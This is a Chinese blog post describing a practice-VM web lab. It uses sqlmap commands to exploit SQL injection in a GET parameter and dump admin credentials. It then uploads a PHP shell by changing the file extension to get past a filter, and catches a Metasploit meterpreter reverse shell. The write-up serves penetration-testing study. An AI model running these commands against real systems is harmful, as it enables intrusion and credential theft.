web靶机系列-GET参数注入

主机:192.168.136.133
靶机:192.168.136.143
用nmap、dirb扫描靶机
在这里插入图片描述
在这里插入图片描述
发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面
在这里插入图片描述
试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵
用owasp-zap扫描
在这里插入图片描述
发现有sql注入
利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs
在这里插入图片描述
有两个数据库
再用sqlmap -u http://192.168.136.143/cat.php?id=3 -D information_schema –tables查看一下information_schema,表太多,直接看下一个有什么。
在这里插入图片描述
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog –tables
在这里插入图片描述
看到有users的表,可能存在登陆账户和密码
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users –columns
在这里插入图片描述
查看login和password
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users -C “login,password” –dump
在这里插入图片描述
看到了登陆账号和密码,返回登陆页面。登陆进去,在new picture选项发现有可上传选项
在这里插入图片描述
在这里插入图片描述
接下来构造shell并写一个php文本上传
在这里插入图片描述
在这里插入图片描述
用msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.136.133
开始run监听
在这里插入图片描述
上传发现出现这个页面
在这里插入图片描述
可能被防火墙过滤,改.PHP
在这里插入图片描述
反弹shell成功
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值